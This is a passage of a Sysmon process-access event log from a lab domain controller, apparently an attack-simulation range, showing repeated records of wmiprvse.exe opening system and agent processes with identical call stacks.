Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024485Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024484Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024483Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024482Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024481Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024480Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024479Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024478Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024477Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024476Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024475Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024474Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024473Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024472Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024471Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024470Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024469Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024468Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024467Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:24.913{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024466Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 